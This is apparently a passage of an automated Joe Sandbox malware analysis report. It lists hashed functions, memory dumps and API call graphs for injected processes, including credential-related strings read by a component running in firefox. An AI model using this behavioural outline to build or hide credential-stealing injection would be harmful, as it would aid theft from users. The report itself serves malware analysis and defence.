                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                      • Opcode ID: 4b90d431633bc565e9abeb8e1aa59cb9679308b58a64fcbcf769829ea3ea0862
                                                                                                                                                      • Instruction ID: 81bdb8cf62c684d7e02c95696ae59f1af3203548197f0644fa918c0404d87029
                                                                                                                                                      • Opcode Fuzzy Hash: 4b90d431633bc565e9abeb8e1aa59cb9679308b58a64fcbcf769829ea3ea0862
                                                                                                                                                      • Instruction Fuzzy Hash: 1A812975D002699BDB35CB54CD44BEEB7B8AB08714F0445EBE91ABB290D7709E84CFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:7.5%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:112
                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                      Graph


                                                                                                                                                      Executed Functions

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02A7F8BC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID: wEj
                                                                                                                                                      • API String ID: 1029625771-1518881957
                                                                                                                                                      • Opcode ID: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction ID: 1df5274fbd9acda8a51d6c923cf7dd9a718c8356a7f230b152608454a621fbd1
                                                                                                                                                      • Opcode Fuzzy Hash: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction Fuzzy Hash: 52612A757413865FEF349E748DF43EA36535FA23A0F98462ECC868B284DB358685C705
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 87 2a82897-2a82955 NtProtectVirtualMemory
                                                                                                                                                      APIs
                                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 02A82953
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                                      • Opcode ID: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction ID: 30e652f02e2b11f9ff611a4357b0be621ef447183133a2195c423c9c6f8c1cf2
                                                                                                                                                      • Opcode Fuzzy Hash: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction Fuzzy Hash: 11016D706482459FEB28DE28DD447EAB7E7AFD4300F45842DAC8997204C7709D45CA15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02A7F8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction ID: a28ca8613d47ef9bd70a9df2cf9cd81e9a943df37496ec382d4f55bf15e7353b
                                                                                                                                                      • Opcode Fuzzy Hash: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction Fuzzy Hash: DC315676B80248DFDF249F649D943DD7BB2AF973A0F380128DC459B200DB318A86CB85
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02A7F8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction ID: 1020c9c2fa370f2df9beb2e575e49a823956c72d9d99a8d9e95930ba85f589e5
                                                                                                                                                      • Opcode Fuzzy Hash: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction Fuzzy Hash: 87312E36A403099FDF30AF249D947DE37A7AF967A0F9001299C498B200DB318A46CB45
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 83 2a73c3f-2a7c3f9 TerminateProcess
                                                                                                                                                      APIs
                                                                                                                                                      • TerminateProcess.KERNELBASE(-2F895780,F9BA47BC,C5C0FA4A,?,00000026), ref: 02A7C3EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 560597551-0
                                                                                                                                                      • Opcode ID: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction ID: 4bb9f6070256d0d44f755182b417c11de4decff90c17cf21febb43c24c1ab2ce
                                                                                                                                                      • Opcode Fuzzy Hash: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction Fuzzy Hash: 43F02870244B82CFCB308E648DE5BDE23775FCA254F809169DD454A14AD3350980C606
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:7.6%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:1.5%
                                                                                                                                                      Total number of Nodes:734
                                                                                                                                                      Total number of Limit Nodes:23

                                                                                                                                                      Graph

5319->5335 5321 2062223a713 5320->5321 5322 20622241412 LdrLoadDll 5321->5322 5323 2062223a76e 5322->5323 5324 20622241412 LdrLoadDll 5323->5324 5325 2062223a792 5324->5325 5326 20622241412 LdrLoadDll 5325->5326 5327 2062223a7b6 5326->5327 5328 20622241412 LdrLoadDll 5327->5328 5329 2062223a7da 5328->5329 5330 20622241412 LdrLoadDll 5329->5330 5331 2062223a7fe 5330->5331 5332 20622241412 LdrLoadDll 5331->5332 5333 2062223a82f 5332->5333 5334 20622242992 LdrLoadDll 5333->5334 5334->5335 5619 2062223ab17 5620 2062223ab09 5619->5620 5621 2062223a9c2 LdrLoadDll 5620->5621 5626 2062223ab0e 5620->5626 5622 2062223ac3f 5621->5622 5623 2062223a9c2 LdrLoadDll 5622->5623 5622->5626 5624 2062223ac54 5623->5624 5625 2062223a9c2 LdrLoadDll 5624->5625 5624->5626 5625->5626 5423 2062223e096 5424 2062223e0d8 5423->5424 5425 20622241412 LdrLoadDll 5424->5425 5426 2062223e167 5425->5426 5336 20622242758 5337 20622242762 5336->5337 5338 20622242770 5337->5338 5341 2062224277c 5337->5341 5339 2062223ff12 LdrLoadDll 5338->5339 5340 20622242775 5339->5340 5342 2062223e0a2 LdrLoadDll 5341->5342 5346 206222428fa 5341->5346 5343 206222427dc 5342->5343 5344 2062223a362 LdrLoadDll 5343->5344 5343->5346 5345 206222427ec 5344->5345 5345->5346 5347 2062224280d 5345->5347 5349 2062224281a 5345->5349 5353 20622242815 5345->5353 5348 206222408a2 LdrLoadDll 5347->5348 5348->5353 5350 206222394b2 LdrLoadDll 5349->5350 5349->5353 5351 20622242835 5350->5351 5352 206222408a2 LdrLoadDll 5351->5352 5354 2062224283d 5352->5354 5353->5346 5355 2062223c812 3 API calls 5353->5355 5356 20622242894 5354->5356 5361 2062224285f 5354->5361 5357 206222428d9 5355->5357 5360 20622239372 LdrLoadDll 5356->5360 5358 20622241412 LdrLoadDll 5357->5358 5359 206222428f6 ExitProcess 5358->5359 5360->5353 5362 2062223f4e2 LdrLoadDll 5361->5362 5363 20622242872 5362->5363 4803 20622242762 4804 2062224276b 4803->4804 4805 20622242770 4804->4805 4809 2062224277c 4804->4809 4897 2062223ff12 4805->4897 4807 20622242775 4808 
206222428fa 4809->4808 4831 2062223e0a2 4809->4831 4811 206222427dc 4811->4808 4835 2062223a362 4811->4835 4814 2062224280d 4931 206222408a2 4814->4931 4816 2062224281a 4817 20622242815 4816->4817 4952 206222394b2 4816->4952 4817->4808 4873 2062223c812 4817->4873 4819 20622242835 4820 206222408a2 LdrLoadDll 4819->4820 4821 2062224283d 4820->4821 4823 20622242894 4821->4823 4828 2062224285f 4821->4828 4972 20622239372 4823->4972 4826 206222428f6 ExitProcess 4968 2062223f4e2 4828->4968 4830 20622242872 4832 2062223e0d8 4831->4832 4833 20622241412 LdrLoadDll 4832->4833 4834 2062223e167 4833->4834 4834->4811 4836 2062223a394 4835->4836 4837 2062223f4e2 LdrLoadDll 4836->4837 4872 2062223a843 4836->4872 4838 2062223a4b3 4837->4838 4839 20622241412 LdrLoadDll 4838->4839 4840 2062223a4d7 4839->4840 4841 20622241412 LdrLoadDll 4840->4841 4842 2062223a4ff 4841->4842 4843 20622241412 LdrLoadDll 4842->4843 4842->4872 4844 2062223a54a 4843->4844 4845 2062223f4e2 LdrLoadDll 4844->4845 4844->4872 4846 2062223a5a1 4845->4846 4847 2062223f4e2 LdrLoadDll 4846->4847 4848 2062223a5b9 4847->4848 4849 20622241412 LdrLoadDll 4848->4849 4850 2062223a5e6 4849->4850 4851 20622241412 LdrLoadDll 4850->4851 4852 2062223a613 4851->4852 4853 20622241412 LdrLoadDll 4852->4853 4852->4872 4854 2062223a64e 4853->4854 4975 20622242992 4854->4975 4856 2062223a662 4856->4872 4981 2062223f672 4856->4981 4858 2062223a713 4859 20622241412 LdrLoadDll 4858->4859 4860 2062223a76e 4859->4860 4861 20622241412 LdrLoadDll 4860->4861 4862 2062223a792 4861->4862 4863 20622241412 LdrLoadDll 4862->4863 4864 2062223a7b6 4863->4864 4865 20622241412 LdrLoadDll 4864->4865 4866 2062223a7da 4865->4866 4867 20622241412 LdrLoadDll 4866->4867 4868 2062223a7fe 4867->4868 4869 20622241412 LdrLoadDll 4868->4869 4870 2062223a82f 4869->4870 4871 20622242992 LdrLoadDll 4870->4871 4871->4872 4872->4808 4872->4814 4872->4816 4872->4817 4874 20622242992 LdrLoadDll 4873->4874 4875 2062223c8c7 4874->4875 4876 20622242992 LdrLoadDll 
4875->4876 4877 2062223c8db 4876->4877 4878 2062223ca6f 4877->4878 4879 2062223f4e2 LdrLoadDll 4877->4879 4892 20622241412 4878->4892 4880 2062223c91f 4879->4880 4985 2062223c302 4880->4985 4882 2062223c940 4882->4878 4883 2062223f4e2 LdrLoadDll 4882->4883 4884 2062223c9cf 4883->4884 4884->4878 4885 20622241412 LdrLoadDll 4884->4885 4886 2062223c9f1 4885->4886 4886->4878 5012 2062223c4b2 4886->5012 4891 20622240c42 LdrLoadDll 4891->4878 4893 2062224162b 4892->4893 4895 20622241437 4892->4895 4893->4826 4894 2062224144e 4894->4826 4895->4894 5082 20622241982 4895->5082 4898 2062223ff3b 4897->4898 4899 2062223e0a2 LdrLoadDll 4898->4899 4900 2062223ff44 4899->4900 4901 20622241412 LdrLoadDll 4900->4901 4929 20622240422 4900->4929 4902 2062223ffe5 4901->4902 4903 20622241412 LdrLoadDll 4902->4903 4904 2062224000d 4903->4904 4905 20622241412 LdrLoadDll 4904->4905 4904->4929 4906 20622240052 4905->4906 4907 20622241412 LdrLoadDll 4906->4907 4909 206222400af 4907->4909 4908 206222400bf 4908->4807 4909->4908 4910 20622241412 LdrLoadDll 4909->4910 4911 20622240132 4910->4911 4911->4908 4912 206222401ab 4911->4912 4913 20622240160 4911->4913 4914 20622241412 LdrLoadDll 4912->4914 5100 2062223fcb2 4913->5100 4915 206222401cc 4914->4915 4918 206222401dd 4915->4918 4919 20622241412 LdrLoadDll 4915->4919 4918->4807 4920 2062224022a 4919->4920 4921 20622241412 LdrLoadDll 4920->4921 4922 2062224025a 4921->4922 4923 20622240335 4922->4923 4926 206222402e2 4922->4926 5112 2062223ab22 4922->5112 5120 2062223fa82 4923->5120 4928 20622241412 LdrLoadDll 4926->4928 4930 20622240376 4926->4930 4927 20622241412 LdrLoadDll 4927->4929 4928->4930 4929->4807 4930->4927 4933 206222408cf 4931->4933 4932 20622240c2c 4932->4817 4933->4932 4934 20622241412 LdrLoadDll 4933->4934 4935 2062224092d 4934->4935 4936 20622241412 LdrLoadDll 4935->4936 4937 2062224095e 4936->4937 4938 20622241412 LdrLoadDll 4937->4938 4939 2062224098f 4938->4939 4944 20622240beb 4939->4944 5132 2062223f7c2 4939->5132 4941 
20622240af5 5136 20622240742 4941->5136 4943 20622240b11 4943->4944 4945 20622241412 LdrLoadDll 4943->4945 4944->4817 4946 20622240b60 4945->4946 4947 20622241412 LdrLoadDll 4946->4947 4948 20622240b8d 4947->4948 4949 20622241412 LdrLoadDll 4948->4949 4950 20622240bbc 4949->4950 4951 20622241412 LdrLoadDll 4950->4951 4951->4944 4953 206222394b3 4952->4953 4954 2062223f4e2 LdrLoadDll 4953->4954 4955 2062223953a 4954->4955 4956 2062223f4e2 LdrLoadDll 4955->4956 4967 2062223961b 4955->4967 4957 2062223955e 4956->4957 4958 20622241412 LdrLoadDll 4957->4958 4957->4967 4959 20622239587 4958->4959 4960 20622241412 LdrLoadDll 4959->4960 4961 206222395ab 4960->4961 4962 20622241412 LdrLoadDll 4961->4962 4963 206222395cf 4962->4963 4964 20622241412 LdrLoadDll 4963->4964 4965 206222395f7 4964->4965 4966 20622241412 LdrLoadDll 4965->4966 4966->4967 4967->4819 4969 2062223f50a 4968->4969 4970 2062223f54a LdrLoadDll 4969->4970 4971 2062223f50e 4969->4971 4970->4971 4971->4830 4973 20622241412 LdrLoadDll 4972->4973 4974 206222393a0 4973->4974 4974->4817 4976 206222429b3 4975->4976 4980 206222429a6 4975->4980 4977 20622241412 LdrLoadDll 4976->4977 4978 206222429c9 4977->4978 4979 20622241412 LdrLoadDll 4978->4979 4978->4980 4979->4980 4980->4856 4982 2062223f6a6 4981->4982 4983 20622241412 LdrLoadDll 4982->4983 4984 2062223f6ee 4983->4984 4984->4858 4986 2062223c31b 4985->4986 4987 2062223c496 4985->4987 4986->4987 4988 20622241412 LdrLoadDll 4986->4988 4987->4882 4989 2062223c343 4988->4989 4990 20622241412 LdrLoadDll 4989->4990 4991 2062223c360 4990->4991 4992 20622241412 LdrLoadDll 4991->4992 4993 2062223c37d 4992->4993 4994 20622241412 LdrLoadDll 4993->4994 4995 2062223c39a 4994->4995 4996 20622241412 LdrLoadDll 4995->4996 4997 2062223c3b7 4996->4997 4998 20622241412 LdrLoadDll 4997->4998 4999 2062223c3d4 4998->4999 5000 20622241412 LdrLoadDll 4999->5000 5001 2062223c3f1 5000->5001 5002 20622241412 LdrLoadDll 5001->5002 5003 2062223c40e 5002->5003 5004 20622241412 LdrLoadDll 
5003->5004 5005 2062223c42b 5004->5005 5006 20622241412 LdrLoadDll 5005->5006 5007 2062223c448 5006->5007 5008 20622241412 LdrLoadDll 5007->5008 5009 2062223c465 5008->5009 5010 20622241412 LdrLoadDll 5009->5010 5011 2062223c482 5010->5011 5011->4882 5013 2062223f672 LdrLoadDll 5012->5013 5014 2062223c5a9 5013->5014 5015 20622241412 LdrLoadDll 5014->5015 5016 2062223c65b 5015->5016 5017 20622241412 LdrLoadDll 5016->5017 5018 2062223c681 5017->5018 5019 2062223c7f2 5018->5019 5020 2062223c6a0 GetPrivateProfileSectionNamesW 5018->5020 5025 20622240c42 5019->5025 5021 2062223c6bd 5020->5021 5031 2062223bb22 5021->5031 5023 2062223c6dd 5023->5019 5035 2062223bf62 5023->5035 5026 20622240c5c 5025->5026 5027 20622241412 LdrLoadDll 5026->5027 5030 2062223ca60 5026->5030 5028 20622240c87 5027->5028 5029 20622241412 LdrLoadDll 5028->5029 5029->5030 5030->4891 5032 2062223bb73 5031->5032 5034 2062223bcda 5032->5034 5044 20622240d02 5032->5044 5034->5023 5036 2062223bfb0 5035->5036 5037 20622240d02 2 API calls 5036->5037 5041 2062223c0dc 5037->5041 5038 2062223c2e2 5038->5023 5039 2062223c2c3 5040 20622240c42 LdrLoadDll 5039->5040 5040->5038 5041->5038 5041->5039 5042 2062223bb22 LdrLoadDll NtCreateFile 5041->5042 5043 2062223bdd2 LdrLoadDll NtCreateFile 5041->5043 5042->5041 5043->5041 5045 2062224138d 5044->5045 5046 20622240d2c 5044->5046 5045->5034 5046->5045 5047 20622240dc0 5046->5047 5048 20622241412 LdrLoadDll 5046->5048 5049 20622240e04 5047->5049 5050 20622240e71 5047->5050 5065 20622240e2f 5047->5065 5048->5047 5054 20622241412 LdrLoadDll 5049->5054 5049->5065 5051 20622240e99 5050->5051 5052 20622241412 LdrLoadDll 5050->5052 5053 20622240ee0 NtCreateFile 5051->5053 5055 20622241412 LdrLoadDll 5051->5055 5051->5065 5052->5051 5056 20622240c42 LdrLoadDll 5053->5056 5054->5065 5057 20622240ed0 5055->5057 5058 20622240f2d 5056->5058 5057->5053 5057->5065 5059 20622241412 LdrLoadDll 5058->5059 5060 20622240f7e 5058->5060 5058->5065 5059->5060 5061 2062224102e 
5060->5061 5062 20622240fd0 5060->5062 5060->5065 5063 206222410e6 5061->5063 5064 20622241037 5061->5064 5062->5065 5068 20622241412 LdrLoadDll 5062->5068 5066 20622241188 5063->5066 5067 206222410ef 5063->5067 5064->5065 5070 20622241412 LdrLoadDll 5064->5070 5065->5034 5071 2062224118d 5066->5071 5072 20622241209 5066->5072 5069 20622241117 5067->5069 5073 20622241412 LdrLoadDll 5067->5073 5068->5065 5069->5065 5074 20622242992 LdrLoadDll 5069->5074 5070->5065 5071->5065 5077 20622241412 LdrLoadDll 5071->5077 5075 20622241212 5072->5075 5076 20622241294 5072->5076 5073->5069 5074->5065 5075->5065 5078 20622241412 LdrLoadDll 5075->5078 5076->5065 5079 20622241412 LdrLoadDll 5076->5079 5080 206222412c5 5076->5080 5077->5065 5078->5065 5079->5080 5080->5065 5081 20622241412 LdrLoadDll 5080->5081 5081->5065 5087 20622241642 5082->5087 5084 20622241997 5085 20622241412 LdrLoadDll 5084->5085 5086 20622241a11 5084->5086 5085->5086 5086->4894 5088 20622241674 5087->5088 5089 206222416e2 5088->5089 5090 2062223f4e2 LdrLoadDll 5088->5090 5089->5084 5091 2062224171d 5090->5091 5091->5089 5094 20622241783 5091->5094 5096 20622242a32 5091->5096 5092 20622241801 5092->5084 5094->5092 5095 20622241982 LdrLoadDll 5094->5095 5095->5092 5097 20622242a47 5096->5097 5098 20622242a5d 5096->5098 5099 20622241412 LdrLoadDll 5097->5099 5098->5094 5099->5098 5101 2062223fcfe 5100->5101 5102 20622241412 LdrLoadDll 5101->5102 5111 2062223fe56 5101->5111 5103 2062223fd6f 5102->5103 5104 2062223fa82 LdrLoadDll 5103->5104 5103->5111 5105 2062223fd92 5104->5105 5106 20622241412 LdrLoadDll 5105->5106 5105->5111 5107 2062223fe29 5106->5107 5108 20622241412 LdrLoadDll 5107->5108 5107->5111 5109 2062223fe7c 5108->5109 5110 20622241412 LdrLoadDll 5109->5110 5109->5111 5110->5111 5111->4807 5114 2062223ab3e 5112->5114 5113 2062223ac69 5113->4923 5114->5113 5128 2062223a9c2 5114->5128 5116 2062223ac3f 5116->5113 5117 2062223a9c2 LdrLoadDll 5116->5117 5118 2062223ac54 5117->5118 5118->5113 5119 
2062223a9c2 LdrLoadDll 5118->5119 5119->5113 5121 2062223fac7 5120->5121 5121->5121 5122 20622241412 LdrLoadDll 5121->5122 5123 2062223fb0d 5122->5123 5124 20622241412 LdrLoadDll 5123->5124 5125 2062223fb36 5124->5125 5126 20622241412 LdrLoadDll 5125->5126 5127 2062223fb91 5125->5127 5126->5127 5127->4926 5129 2062223aa1c 5128->5129 5130 20622241412 LdrLoadDll 5129->5130 5131 2062223aa35 5130->5131 5131->5116 5133 2062223f80d 5132->5133 5134 20622241412 LdrLoadDll 5133->5134 5135 2062223f900 5134->5135 5135->4941 5137 2062223f672 LdrLoadDll 5136->5137 5138 206222407ba 5136->5138 5137->5138 5138->4943 5529 206222434e3 5530 206222434ed 5529->5530 5533 20622239f72 5530->5533 5532 20622243510 5534 20622239f91 5533->5534 5537 20622239faa 5533->5537 5535 206222390f2 LdrLoadDll 5534->5535 5536 20622239f99 5535->5536 5536->5532 5537->5532 5538 206222438e5 5539 206222438f7 5538->5539 5542 206222436f2 5539->5542 5541 206222438fc 5543 20622243707 5542->5543 5544 20622242762 4 API calls 5542->5544 5543->5541 5544->5543 5364 20622239363 5365 20622239367 5364->5365 5366 20622241412 LdrLoadDll 5365->5366 5367 206222393a0 5365->5367 5366->5367 5545 2062223d5e0 5546 2062223d5e3 5545->5546 5547 2062223d492 LdrLoadDll 5546->5547 5548 2062223d698 5547->5548 5549 2062223e4d2 LdrLoadDll 5548->5549 5550 2062223e081 5549->5550

                                                                                                                                                      Executed Functions

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.28537972227.0000020622190000.00000040.00020000.sdmp, Offset: 0000020622190000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_20622190000_firefox.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NamesPrivateProfileSection
                                                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                      • API String ID: 709140578-2058692283
                                                                                                                                                      • Opcode ID: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
                                                                                                                                                      • Instruction ID: 4ab9bf8dd74ef3dcd83a26a31586f2d600d68021fe0f7e145c99cc22837a463c
                                                                                                                                                      • Opcode Fuzzy Hash: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
                                                                                                                                                      • Instruction Fuzzy Hash: 0BA1A070618748CFEB19EF6894487EEB7E1FB98300F00462DE84AD7292DF719655C785
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.28537972227.0000020622190000.00000040.00020000.sdmp, Offset: 0000020622190000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_20622190000_firefox.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: `
                                                                                                                                                      • API String ID: 823142352-2679148245
                                                                                                                                                      • Opcode ID: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
                                                                                                                                                      • Instruction ID: 0a049f45cf2823c351f08bbeb0ac58cbebeb62bcb1b7097737ee552ac387ffab
                                                                                                                                                      • Opcode Fuzzy Hash: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
                                                                                                                                                      • Instruction Fuzzy Hash: 71224F70618B0ADFDB99DF28C48D7ADB7E1FB58300F50422AD85ED7291DB31A661CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.28537972227.0000020622190000.00000040.00020000.sdmp, Offset: 0000020622190000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_20622190000_firefox.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
                                                                                                                                                      • Instruction ID: 40705fe0112b0059880139463e622ebc829e3e1b9cdd51a1a08f572898a57d01
                                                                                                                                                      • Opcode Fuzzy Hash: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
                                                                                                                                                      • Instruction Fuzzy Hash: 3B417530616B06EEFBA8FB29448D7ED62D1FF54300FD406299C0BC61D3DEA6DA61C661
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.28537972227.0000020622190000.00000040.00020000.sdmp, Offset: 0000020622190000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_20622190000_firefox.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      • Opcode ID: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                                                      • Instruction ID: 3bcf8f073df5a87f8e28072db485fd45547ca76756a8050d859c5ed449438cd0
                                                                                                                                                      • Opcode Fuzzy Hash: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                                                      • Instruction Fuzzy Hash: A901B531109B098FE754EB25D88D7E772D1FBE8304F44052A684EC6192EE36D751C641
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:7.5%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:112
                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                      Graph


                                                                                                                                                      Executed Functions

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02BCF8BC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
